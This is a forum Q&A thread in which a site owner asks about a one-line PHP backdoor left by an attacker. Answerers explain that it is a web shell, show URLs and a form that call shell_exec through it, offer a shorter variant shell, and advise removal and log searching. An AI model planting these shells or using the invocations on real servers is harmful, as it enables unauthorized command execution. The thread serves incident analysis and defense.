Found codes left by hacker but don't understand what it does

Question

I found a line of script left by the hacker in one of my PHP files. And it reads like this:

<?php

($_=@$_GET[2]).@$_($_POST[1]);

?>

Can anyone please give some hints about what this line of code does? Thank you

Answer 1

As Reeno already said in a comment, it's like a PHP shell.

Explanation

• Store the GET variable with the key '2' in a variable called $_. Due to PHP's nature of weak typing, we do not need quotes around the number.

  $_=@$_GET[2]
  

• Treat $_ as a callable function name and execute it with $_POST[1] as the first argument.

  @$_($_POST[1])
  

The @ operators should suppress error logging, see PHP.net: Error Control Operators.

The concatenation operator between the two statements does actually nothing important. It could be rewritten like this:

$_=@$_GET[2];
@$_($_POST[1]);

Use case

Calling arbitrary functions. I won't mention the specific HTTP headers for a successful attack, but this should be fairly easy for every (web) programmer.

Answer 2

I already posted it as a comment since the question was on hold, here now as an answer:

It's a PHP shell. If you rewrite it to <?php ($_=@$_GET[2]).@$_($_GET[1]); ?> the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.

You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.

Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.

/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.

Answer 3

First of all, you must remove those lines as soon as possible.

This code is used to call PHP functions. To give you an example, your hacker will use this kind of form :

<form method="post" action="http://site.com/page.php?2=shell_exec">
    <input name="1" value="ipconfig -all"/>
    <input type="submit" value="Send"/>
</form>

You'll then get this values :

• $_ = $_GET[2] = shell_exec
• $_POST[1] = ipconfig -all
• $_($_POST[1]) = $_("ipconfig -all") = shell_exec("ipconfig -all")

@ are here to disable errors.

---

A simpler example would be to use this code :

<?= @$_GET['c'](@$_GET['p']); ?>

With a simple call to http://site.com/page.php?c=shell_exec&p=ipconfig%20-all .